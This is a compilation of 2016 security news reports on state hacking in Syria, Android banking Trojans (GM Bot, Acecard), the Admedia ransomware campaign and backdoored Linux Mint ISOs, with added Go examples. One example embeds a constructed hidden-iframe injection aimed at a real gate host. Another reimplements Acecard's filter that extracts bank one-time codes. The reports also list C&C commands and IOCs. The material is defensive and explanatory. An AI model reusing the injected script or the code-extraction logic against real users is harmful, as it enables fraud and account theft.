Russian Nation-state hackers intensify operations in Syria
23.2.2016 Hacking

According to security experts, Russian nation-state hackers are behind cyber espionage campaigns against opposition groups and NGOs in Syria.
Russia is reportedly running a cyber espionage campaign against Syrian opposition groups and NGOs; the experts believe the Kremlin's aim is a psychological operation to shape opinion on the humanitarian crisis and to divert attention from its military operations in the area.

The Russian hackers target the most active human rights organizations and aid groups in the country, including the Syrian Observatory for Human Rights.

The experts have found many similarities with other operations conducted by Russian nation-state actors, for example during the Ukrainian crisis.

The hackers used malware to compromise the targeted organizations and then spread disinformation from the victims' official accounts.

(Image source: BBC)

Security experts at FireEye have collected evidence of Russian nation-state activity against Syrian organizations. Richard Turner, head of Middle East and Europe at FireEye, said that hacking activity by Russian entities has been intensifying since the start of the year.

“APT 28 and other Russian groups are now really focusing their attention on the collection of data on Syrian groups, particularly those focused on human rights and the monitoring of Russian military activity,” explained Turner. “It’s a very significant operation. Clearly this is to enable them to respond politically . . . to target [the groups] for information warfare and to have an impact on the conflict itself.”

The Financial Times discussed the campaign with two senior intelligence officials, who attribute it to the Russian FSB.

“Details of the Syrian campaign were discussed with two senior intelligence officials, one from Europe and one from a country neighbouring Syria. The operation was large in scale and systematic in nature, one of them said, speaking on condition of anonymity, adding that the campaign was directed by the FSB, Russia’s state security agency.” states a blog post on the Financial Times.

According to the intelligence officials, Russian hackers are also targeting organisations in Turkey that handle information on the Turkish government's involvement in the Syrian conflict. The hackers are collecting any kind of information on the Turkish government, a consequence of the worsening relations between the two countries.

Western intelligence is worried about how events in Syria are evolving; Western politicians believe that Russia's involvement in the fight against Isis in the country is really intended to prop up Bashar al-Assad's government against dissidents. Many organizations accuse Russian forces in the area of attacks on civilians and on opponents of the regime.

The FireEye experts found that the hackers launched spear-phishing campaigns against their targets and also set up replicas of legitimate organisations' websites to track visitors and identify opponents of the regime.

“It could be for two reasons,” said Jens Monrad, global intelligence liaison at FireEye. “One is to send out false information from those groups, or they could be using their credentials as stepping stones to go on and target other individuals or organisations. It all fits with Russia’s traditional information warfare doctrine.”


Integration of the LOGmanager and AddNet tools will make it easier to eliminate network threats

22.2.2016 Security
Sirwisa and Novicom have announced the integration of their security products LOGmanager and AddNet. The goal is to significantly shorten and simplify the key process of responding to cyber security threats, from detecting a threat to fully blocking it or isolating the compromised device on the organisation's network.

LOGmanager, a central log store and SIEM, can now process logs from the AddNet security solution, which manages IP address space and controls access security in large networks.

It will thus work with the key information provided by AddNet and will allow, for example, clicking directly from a workstation's IP address through to information about its location: not only which switch and which VLAN the station is on, but also its physical location, down to the room.

"We see AddNet as a key component of the Active Network Security concept, which is why we want LOGmanager to fully understand the information from this security system and present it to network administrators and security managers with maximum convenience," says Filip Weber, CEO of Sirwisa.

According to Jindřich Šavel, sales director at Novicom, his company sees great benefit in integrations of this kind and believes that by combining a sophisticated cyber threat detection tool with a practical tool for immediately locating a device (detailed L2 monitoring) that can also disconnect it directly (NAC), administrators get a very advanced solution with a response time measured in seconds.


GM Bot (Android Malware) Source Code Leaked Online
22.2.2016 Android
The source code of a recently discovered Android banking Trojan, which can gain administrator access on a smartphone and completely wipe the phone's storage, has been leaked online.
The banking Trojan family is known by several names: researchers at FireEye dubbed it SlemBunk, Symantec calls it Bankosy, and when Heimdal Security uncovered a variant last week they named it MazarBot.
All of these Android banking Trojans originate from a common family, dubbed GM Bot, which IBM has been tracking since 2014.
GM Bot emerged on Russian cybercrime underground forums, where it sold for $500 / €450, but it appears that someone who bought the code leaked it on a forum in December 2015, the IBM X-Force team reported.
What is GM Bot and Why Should You Worry about it?
The recent version of GM Bot (dubbed MazarBOT) can display phishing pages on top of mobile banking applications to trick Android users into handing their financial credentials to the fraudsters.
The banking Trojan can also forward phone calls and intercept SMS messages, which helps the fraudsters bypass a bank's additional layer of security (SMS-delivered one-time codes offer little protection against malware that is already on the device), and it can lock the device's screen.
Cyber criminals could also use the malware to:
Spy on victims
Delete data from the infected device
Gain boot persistence to survive device restarts
Send and read your SMS messages
Make calls to your contacts
Read the phone's state
Tamper with the phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most destructive of its capabilities)
Someone leaked the source code to an underground forum apparently only to boost their reputation there, according to the researchers.
GM Bot Android Malware Source Code for FREE
Yes, the source code for GM Bot and its control panel is now accessible to cybercriminals and fraudsters for free.
Here's the cherry on top:
Besides the source code, the leaker also posted a tutorial and instructions for the server-side installation, which means cybercriminals can build their own versions of the malware to conduct online banking fraud.
Although the archive containing the source code and its control panel is password protected, the leaker hands the password to any active forum member who approaches him.
"Those who received the password, in turn, passed it on to other, unintended users, so the actual distribution of the code went well beyond that discussion board’s member list," IBM cyber security evangelist Limor Kessem wrote in a blog post.
Users who had received the password started sharing it among their friends, and in no time the GM Bot source code was all over the hacking underground forums.
GM Bot is one of the most dangerous banking Trojans in the Android ecosystem, and now that its source code has leaked, users should be especially careful when banking online.
How to Protect Yourself?
As I previously mentioned, online users are advised to follow these steps in order to protect themselves against this kind of threat:
Never open attachments from unknown sources.
Never click on links in SMS or MMS messages sent to your phone.
Even if the email looks legit, go directly to the source website and verify any possible updates.
Go to Settings → Security and make sure "Unknown sources" (allow installation of apps from sources other than the Play Store) is turned OFF.
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots, and keep Wi-Fi turned off when not in use.


NSA Data Center Experiencing 300 Million Hacking Attempts Per Day
22.2.2016 Hacking
Utah state government computer systems are seeing up to 300 million hacking attempts per day, an onslaught attributed to the presence of the National Security Agency's (NSA) data center in the state.
Yes, 300,000,000 hacking attempts in a day!
According to state officials, attacks against Utah's systems began to climb a few years ago, shortly after the NSA revelations by whistleblower Edward Snowden.
The NSA built its new data center near Bluffdale, Utah. Since Snowden's disclosures drew attention to the facility a couple of years ago, the attacks have been continuous.
The PRISM surveillance program may have turned hackers' attention to the NSA as a target for retaliation against mass surveillance, fuelling the heightened attacks on the agency's surroundings.
According to Utah Commissioner of Public Safety Keith Squires, as quoted by KUTV:
"In 2010, my IT director was letting me know that the number of attacks we were averaging a day was between 25,000 to 80,000. We had peaks in the past year or so that were over 300,000,000 a day."
Advanced weapons programs at Hill Air Force Base and the technology companies based in Utah may also be drawing attackers.
TECHNICALITIES
State security officers traced the sudden influx of traffic to foreign IP ranges and said the pattern is typical of botnet activity.
A botnet scans exposed systems for exploitable weaknesses and infects them, following instructions from its command and control (C&C) infrastructure.
To reduce the attack surface, Utah's security officers have blocked IP address ranges from China, Russia and Indonesia, a measure that cuts down on unsophisticated scanning but is trivially bypassed by attackers who route through hosts in other countries.
In most cases the attackers are probing for a single foothold, hoping it might eventually lead them toward NSA systems.
The NSA has been put on alert, and a short note for the hackers:
Big Brother is watching you!


Admedia attacks now rely also on Joomla to serve ransomware

22.2.2016 Virus

Operators of websites built on WordPress or Joomla should be aware of a spike in the number of compromised installations used in Admedia attacks.
The threat actors behind the “Admedia attacks” are no longer limiting themselves to WordPress: the SANS Internet Storm Center (ISC) has found the same actors behind a campaign targeting Joomla-hosted sites.

In early February, Sucuri reported a spike in compromised WordPress sites injecting hidden iframes whose URLs pointed at a domain hosting an exploit kit. Sucuri observed the string “admedia” in most of the URLs generated by those iframes.

“These “admedia” URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuri’s original blog post.” states an analysis published by the Internet Storm Center (ISC).

The campaign is evolving. On Wednesday 2016-02-17 Brad Duncan, a security researcher at Rackspace who wrote the ISC diary, documented the new attack chain: a compromised website generates an admedia gate, which leads to Angler EK, which in turn delivers TeslaCrypt to vulnerable machines. He also notes that the crooks behind the admedia attacks initially relied on the Nuclear exploit kit and have now added Angler.

The analysis of the traffic generated by the malware allowed the ISC to identify the following components:

178.62.122.211 – img.belayamorda.info – admedia gate
185.46.11.113 – ssd.summerspellman.com – Angler EK
192.185.39.64 – clothdiapersexpert.com – TeslaCrypt callback traffic
The compromised websites generate the admedia gate through malicious script injected into their pages.

“As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. In a case on 2016-02-15, I also saw the same type of script included in an HTML page from the compromised website; however, today’s traffic only shows injected script in the .js files.” Duncan wrote.

(Image: traffic capture from the ISC diary showing the new gate URL.)

As the capture shows, the attackers have started using “megaadvertize” in their gateway URLs instead of “admedia.”
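As an added illustration (not part of the ISC or Sucuri analysis), the following Go program shows how a site operator could sweep their own .js files for the two artefacts described above: a URL pointing at a known gate host or carrying one of the campaign's path tokens, and the construction of an off-screen or zero-size iframe. The gate hosts come from the indicators listed above; the JavaScript samples are constructed for the example, and the cdn.example.net host is a placeholder, not an observed indicator.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one suspicious artefact in a scanned .js file.
type Finding struct {
	File   string
	URL    string // empty for the hidden-iframe finding
	Reason string
}

// Gate hosts from the ISC indicators quoted above.
var knownGateHosts = map[string]bool{
	"img.belayamorda.info": true,
	"178.62.122.211":       true,
}

// Path tokens this campaign has used in its gate URLs so far.
var gateTokens = []string{"admedia", "megaadvertize"}

// A URL literal inside JavaScript source; quotes and parentheses end it.
var urlRe = regexp.MustCompile(`https?://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+`)

// Idioms that keep an injected iframe invisible or off-screen (applied to a
// lower-cased window of text, so no case-insensitive flag is needed).
var hideIdioms = []*regexp.Regexp{
	regexp.MustCompile(`display\s*[:=]\s*["']?none`),
	regexp.MustCompile(`visibility\s*[:=]\s*["']?hidden`),
	regexp.MustCompile(`(left|top)\s*[:=]\s*["']?-\d`),
	regexp.MustCompile(`(width|height)\s*[:=]\s*["']?[01]\b`),
}

// hiddenIframe reports whether an iframe is created within 500 bytes of a
// hiding idiom.
func hiddenIframe(body string) bool {
	lower := strings.ToLower(body)
	idx := strings.Index(lower, "iframe")
	if idx < 0 {
		return false
	}
	window := lower[idx:]
	if len(window) > 500 {
		window = window[:500]
	}
	for _, re := range hideIdioms {
		if re.MatchString(window) {
			return true
		}
	}
	return false
}

// ScanJS flags gate URLs (by known host, else by path token) and
// hidden-iframe construction in the body of one JavaScript file.
func ScanJS(name, body string) []Finding {
	var out []Finding
	for _, raw := range urlRe.FindAllString(body, -1) {
		u, err := url.Parse(raw)
		if err != nil {
			continue
		}
		if knownGateHosts[u.Hostname()] {
			out = append(out, Finding{name, raw, "known gate host " + u.Hostname()})
			continue
		}
		pathAndQuery := strings.ToLower(u.Path + "?" + u.RawQuery)
		for _, t := range gateTokens {
			if strings.Contains(pathAndQuery, t) {
				out = append(out, Finding{name, raw, "gate token " + t + " in URL"})
				break
			}
		}
	}
	if hiddenIframe(body) {
		out = append(out, Finding{name, "", "hidden iframe construction"})
	}
	return out
}

// Constructed samples, not real captures: a clean library file, the same file
// with an appended block pointing at a known gate host, and a document.write
// variant on a placeholder host that keeps the "admedia" token.
const cleanJS = `(function($){$(function(){$('#menu').show();});})(window.jQuery);`

const injectedJS = cleanJS + `
var d=document,i=d.createElement('iframe');
i.src="http://img.belayamorda.info/megaadvertize/?id=7&q=x";
i.style.position="absolute";i.style.left="-9999px";i.width=1;i.height=1;
d.body.appendChild(i);`

const tokenOnlyJS = `document.write('<iframe src="http://cdn.example.net/admedia/?ver=2" width="1" height="1"></iframe>');`

func main() {
	files := map[string]string{"jquery.js": cleanJS, "jquery.js (injected)": injectedJS, "footer.js": tokenOnlyJS}
	for name, body := range files {
		for _, f := range ScanJS(name, body) {
			fmt.Printf("%-22s %-30s %s\n", f.File, f.Reason, f.URL)
		}
	}
}
```

Run it over a copy of the web root with one ScanJS call per file. Because the injection is appended to otherwise legitimate library files, a diff against a pristine copy of the CMS and its plugins remains the more reliable control; this scan is quick triage. The strings will change again, as the switch from admedia to megaadvertize shows, so the known-host list and the hidden-iframe heuristic deserve more weight than the path tokens.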


The Evolution of Acecard
22.2.2016 Source: Kaspersky Virus

While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard. This family accounted for almost all the banker Trojan attacks in Australia.

After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications. In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords. Two other apps are targeted by the Trojan for their credit card details. But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages.

Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices. All three Trojans run on Android.

How it all started

Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family.

It all started with Backdoor.AndroidOS.Torec.a. The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
#grab_apps – send a list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to numbers specified in the command;
#control_number – change the phone’s control number.
Then, in April 2014, a new version emerged with more capabilities. The additional commands were:

#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the SMS interception list;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#sentid – send an SMS with the Trojan’s ID to a specified number.
In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a. It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C.

A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields.

We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware. From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family.

An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. The original post illustrates this with two sets of screenshots, each showing the same excerpt of the SmsProcessor class as it appears in Backdoor.AndroidOS.Torec.a, Trojan-Banker.AndroidOS.Acecard.a and Trojan-Ransom.AndroidOS.Pletor.a.

A lot of the class, method and variable names are the same for all three Trojans. The code of the corresponding methods is either the same or very similar, with only minor differences.

Acecard’s progress

The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number.
The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor. Besides that, we identified two more differences. Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send the Trojan’s ID to the C&C;
#grab_apps – send the list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number;
#sentid – send an SMS with the Trojan’s ID to a specified number;
#show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.
The second difference was the number of phishing windows. Along with the official Google Play Store app, this Trojan now overlaid the following apps with its own windows:

IM services: WhatsApp, Viber, Instagram, Skype;
the VKontakte, Odnoklassniki and Facebook social network apps;
the Gmail client;
the official Twitter client.

In the second half of October 2014, we detected the next modification of Acecard. It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users. The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users. This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries.

At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US. The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia.

A new modification of Acecard emerged in mid-November 2014. As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks.

This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect.

This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down. This check is carried out in almost all subsequent modifications. Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware.

For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window.

There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings.

It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015. Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.

(Chart: number of Acecard files detected each month.)

The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans. The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan.

Also at this time, there was an increase in the number of attacks using this malicious program.

(Chart: number of unique users attacked by Acecard per month.)

In the first half of September, we detected a new modification of Acecard. Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks.

It means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window.

The subsequent development of Acecard’s “banking business” then got even faster:

The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications. The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks.
In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal. The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS. This version of Acecard intercepts SMSs from 17 Russian banks.
Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks. Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users. In that month, the US came third in terms of the number of unique users attacked by this malware.
In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app.
A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.
It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.
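The sender-list plus phrase-list filter described for the late-September modification can be reproduced in a few lines, and a bank's security team can use the same logic to check whether its own SMS templates would be parsed by such a filter. The following Go program is an added example written for this page, not Acecard code; the sender identifiers, phrases and messages are constructed stand-ins rather than values taken from a sample.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// SMS is an incoming message as the Trojan's receiver sees it.
type SMS struct {
	From, Body string
}

// Verdict is what happens to the message: delivered to the user untouched,
// the whole text forwarded to the operator, or only the extracted code.
type Verdict struct {
	Action  string // "deliver", "forward-full" or "forward-code"
	Payload string // what would leave the device
}

// Constructed stand-ins for the Trojan's hardcoded lists; real samples carry
// the short codes of specific banks and phrases in the local language.
var bankSenders = map[string]bool{"BANK-A": true, "10100": true}
var codePhrases = []string{"code", "password", "confirm", "код", "пароль"}

// A 4- to 8-digit token standing alone; longer digit runs (phone numbers,
// account numbers) are deliberately not matched.
var codeRe = regexp.MustCompile(`\b\d{4,8}\b`)

// Triage applies the two-stage filter: sender list first, phrase list second.
func Triage(m SMS) Verdict {
	if !bankSenders[strings.ToUpper(m.From)] {
		return Verdict{"deliver", ""}
	}
	body := strings.ToLower(m.Body)
	for _, p := range codePhrases {
		if strings.Contains(body, p) {
			if code := codeRe.FindString(m.Body); code != "" {
				return Verdict{"forward-code", code}
			}
		}
	}
	return Verdict{"forward-full", m.Body}
}

func main() {
	// Constructed messages, not real bank templates.
	samples := []SMS{
		{"BANK-A", "Your confirmation code is 483921 for a transfer of 1,000 EUR"},
		{"10100", "Ваш пароль: 77812. Никому не сообщайте"},
		{"10100", "Your monthly statement is ready"},
		{"+15550100", "lunch at 1230?"},
	}
	for _, s := range samples {
		v := Triage(s)
		fmt.Printf("%-10s %-12s %q\n", s.From, v.Action, v.Payload)
	}
}
```

Two things follow from the triage. A message from a listed sender never reaches the user, so on the device side the only real defence is restricting which apps hold the SMS-receive and overlay permissions. And the extractor only needs a 4- to 8-digit token near a trigger word, which is exactly what every OTP template provides; binding the code to the transaction details in the message body does not help, because the malware forwards the whole text whenever it cannot isolate the code.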


The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems. Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger.

Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.

(Chart: number of unique users attacked by country.)

In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.

Propagation

In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software. This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard.

We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.

(Screenshot: the Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store.)

The Trojan propagates under the guise of a game, but in reality it has no useful functionality. The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard. Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the home screen.

We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c. It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges, Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to remove with standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor.

The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans. This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.

MD5

58FED8B5B549BE7ECBFBC6C63B84A728
8D260AB2BB36AEAF5B033B80B6BC1E6A
CF872ACDC583FE80B8F54957E14355DF
FBBCCD640CE75BD618A7F3187EC1B742
01E8CEA7DF22B1B3CC560ACB049F8EA0
DDCE6CE143CCA26E59063E7A4BB89019
9D34FC3CFCFFEA760FC1ADD377AA626A
03DA636518CCAF432AB68B269F7E6CC3
05EBAA5C7FFA440455ECB3519F923B56
E3FD483AD3731DD62FBE027B4E6880E6
53888352A4A1E3CB810B2A3F51D0BFC2
E1C794A614D5F6AAC38E2AEB77B139DA
54332ED8EA9AED12400A75496972D7D7
5DB57F89A85F647EBBC5BAFBC29C801E
702770D70C7AAB793FFD6A107FD08DAD
CF25782CAC01837ABACBF31130CA4E75
07DF64C87EA74F388EF86226BC39EADF


Beware of Backdoored Linux Mint ISOs
22.2.2016 Source: Kaspersky Virus

Yesterday a blog post on “The Linux Mint Blog” caught our attention. Apparently criminals managed to compromise a vulnerable WordPress instance that the project used to run its website. The attackers modified the download links to point at backdoored ISO images of the Linux Mint 17.3 Cinnamon edition. This “should only impact people who downloaded this edition on February 20th”, the author of the blog post stated.

We managed to get our hands on the malware embedded in the ISO images. Let’s have a quick look.

Malware used

The criminals used a simple backdoor, which is controlled via an unencrypted IRC connection. We found five hardcoded C&C addresses; at the time of writing only one of them was reachable. We saw approx. 50 clients connected to a single channel called “#mint”:

(Screenshot: IRC channels and user count on the malicious C&C server.)

The malware is capable of:

running several types of UDP and TCP flooding (used in DDoS attacks)
downloading arbitrary files to the victim’s machine
executing arbitrary commands on the machine
We’re detecting this type of malware as HEUR:Backdoor.Linux.Tsunami.bh.

According to user reports, the compromised ISO images come with the backdoor’s C-source code, located in /var/lib/man.cy, which is compiled on first startup to “apt-cache” and is then executed.

Activity

While monitoring the C&C channel, we saw the criminal sending several SMB-related commands, such as “smbtree -N”, to the connected bots. Apparently the attacker is trying to enumerate SMB/CIFS shares reachable from the victims' local networks.

Conclusion

To detect this kind of attack, one should rely on strong cryptographic signatures (PKI) to ensure the integrity of downloaded software: the checksum file must itself be signed, and the signing key must be obtained from somewhere other than the website being verified.

Integrity checks based on file hashes alone, whether MD5 or SHA256, are insecure if a project’s website is compromised, since the attacker can also adjust the checksums published on the website. The choice of hash still matters once the manifest is signed: the signature binds the manifest, and the hash binds the manifest to the file, so use SHA256 rather than MD5, for which collisions are practical.
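To make the conclusion concrete, here is an added Go example (not part of the Kaspersky post or of the Linux Mint project's tooling) that models the two checks a downloader can run: a bare "sha256sum --check" against a manifest fetched from the same site, and verification of a maintainer signature over that manifest with a public key pinned out of band. Ed25519 from Go's standard library stands in for the project's GPG key, and the image bytes are tiny stand-ins for the ISO.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Release is what a download mirror serves: the images, the sha256sum.txt
// manifest and a detached signature over that manifest.
type Release struct {
	Files    map[string][]byte // filename -> image bytes (tiny stand-ins here)
	Manifest string            // "<sha256 hex>  <filename>" per line
	Sig      []byte            // maintainer's signature over Manifest
}

func sha256Hex(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// BuildManifest produces the manifest in sha256sum's output format.
func BuildManifest(files map[string][]byte) string {
	names := make([]string, 0, len(files))
	for n := range files {
		names = append(names, n)
	}
	sort.Strings(names)
	var sb strings.Builder
	for _, n := range names {
		fmt.Fprintf(&sb, "%s  %s\n", sha256Hex(files[n]), n)
	}
	return sb.String()
}

// CheckHashes does what `sha256sum --check` does and nothing more: compare
// each file with the manifest it was downloaded next to.
func CheckHashes(manifest string, files map[string][]byte) error {
	for _, line := range strings.Split(strings.TrimSpace(manifest), "\n") {
		parts := strings.Fields(line)
		if len(parts) != 2 {
			return fmt.Errorf("malformed manifest line %q", line)
		}
		data, ok := files[parts[1]]
		if !ok {
			return fmt.Errorf("%s: file missing", parts[1])
		}
		if sha256Hex(data) != parts[0] {
			return fmt.Errorf("%s: hash mismatch", parts[1])
		}
	}
	return nil
}

// VerifyRelease is the check users should run: validate the maintainer's
// signature with a public key obtained out of band (not from the possibly
// compromised download page), and only then trust the hashes.
func VerifyRelease(pub ed25519.PublicKey, r Release) error {
	if !ed25519.Verify(pub, []byte(r.Manifest), r.Sig) {
		return errors.New("manifest signature invalid: do not trust these hashes")
	}
	return CheckHashes(r.Manifest, r.Files)
}

// Scenario replays the incident with stand-in bytes and returns the result of
// the signed check on the genuine release, the hash-only check on the
// tampered release, and the signed check on the tampered release.
func Scenario() (genuine, hashOnly, signed error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // maintainer key; pub is what users pin
	if err != nil {
		panic(err)
	}
	const iso = "linuxmint-17.3-cinnamon-64bit.iso"
	good := Release{Files: map[string][]byte{iso: []byte("genuine image bytes (stand-in)")}}
	good.Manifest = BuildManifest(good.Files)
	good.Sig = ed25519.Sign(priv, []byte(good.Manifest))

	// The attacker controls the web server: they swap the image and rewrite
	// sha256sum.txt to match, but cannot produce a new signature without priv.
	bad := Release{Files: map[string][]byte{iso: []byte("backdoored image bytes (stand-in)")}}
	bad.Manifest = BuildManifest(bad.Files)
	bad.Sig = good.Sig

	return VerifyRelease(pub, good), CheckHashes(bad.Manifest, bad.Files), VerifyRelease(pub, bad)
}

func main() {
	genuine, hashOnly, signed := Scenario()
	fmt.Println("genuine release, signed check:   ", genuine)
	fmt.Println("tampered release, hash-only check:", hashOnly)
	fmt.Println("tampered release, signed check:  ", signed)
}
```

The hash-only check passes on the tampered release because the attacker rewrote sha256sum.txt alongside the ISO; the signed check fails because the old signature no longer covers the new manifest and the attacker cannot produce a fresh one. In practice this is "gpg --verify sha256sum.txt.gpg sha256sum.txt" followed by "sha256sum --check", with the key fetched from a keyserver or from a previous installation rather than from the download page.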


FBI must reveal the network investigative technique used to hack more than 1000 computers

22.2.2016 Hacking

The FBI must provide details on the network investigative technique used to hack more than 1000 computers in a case involving child pornography.
In a case involving child pornography, a judge has ordered the FBI to hand over all the code used to hack suspects' computers, together with details of the procedure followed to de-anonymize Tor users.

Colin Fieman, a federal public defender working on the case, was asked by Motherboard (motherboard.vice.com) whether the code would include exploits to bypass security features; Fieman replied that the code would bypass “everything.”

“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told Motherboard.

